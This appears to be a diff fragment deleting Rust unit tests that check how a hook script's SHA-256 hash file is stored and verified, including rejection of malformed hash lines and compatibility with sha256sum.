-
463
- let removed = remove_hash(&hook).unwrap();
464
- assert!(!removed);
465
- }
466
-
467
- #[test]
468
- fn test_invalid_hash_file_rejected() {
469
- let temp = TempDir::new().unwrap();
470
- let hook = temp.path().join("rtk-rewrite.sh");
471
- let hash_file = temp.path().join(".rtk-hook.sha256");
472
-
473
- fs::write(&hook, "test").unwrap();
474
- fs::write(&hash_file, "not-a-valid-hash rtk-rewrite.sh\n").unwrap();
475
-
476
- let result = verify_hook_at(&hook);
477
- assert!(result.is_err(), "Should reject invalid hash format");
478
- }
479
-
480
- #[test]
481
- fn test_hash_only_no_filename_rejected() {
482
- let temp = TempDir::new().unwrap();
483
- let hook = temp.path().join("rtk-rewrite.sh");
484
- let hash_file = temp.path().join(".rtk-hook.sha256");
485
-
486
- fs::write(&hook, "test").unwrap();
487
- // Hash with no two-space separator and filename
488
- fs::write(
489
- &hash_file,
490
- "a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2\n",
491
- )
492
- .unwrap();
493
-
494
- let result = verify_hook_at(&hook);
495
- assert!(
496
- result.is_err(),
497
- "Should reject hash-only format (no filename)"
498
- );
499
- }
500
-
501
- #[test]
502
- fn test_wrong_separator_rejected() {
503
- let temp = TempDir::new().unwrap();
504
- let hook = temp.path().join("rtk-rewrite.sh");
505
- let hash_file = temp.path().join(".rtk-hook.sha256");
506
-
507
- fs::write(&hook, "test").unwrap();
508
- // Single space instead of two-space separator
509
- fs::write(
510
- &hash_file,
511
- "a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 rtk-rewrite.sh\n",
512
- )
513
- .unwrap();
514
-
515
- let result = verify_hook_at(&hook);
516
- assert!(result.is_err(), "Should reject single-space separator");
517
- }
518
-
519
- #[test]
520
- fn test_hash_format_compatible_with_sha256sum() {
521
- let temp = TempDir::new().unwrap();
522
- let hook = temp.path().join("rtk-rewrite.sh");
523
- fs::write(&hook, "#!/bin/bash\necho hello\n").unwrap();
524
-
525
- store_hash(&hook).unwrap();
526
-
527
- let hash_file = temp.path().join(".rtk-hook.sha256");
528
- let content = fs::read_to_string(&hash_file).unwrap();
529
-
530
- // Should be parseable by sha256sum -c
531
- // Format: "<hash> <filename>\n"
532
- let parts: Vec<&str> = content.trim().splitn(2, " ").collect();
533
- assert_eq!(parts.len(), 2);
534
- assert_eq!(parts[0].len(), 64);
535
- assert_eq!(parts[1], "rtk-rewrite.sh");
536
- }
537
- }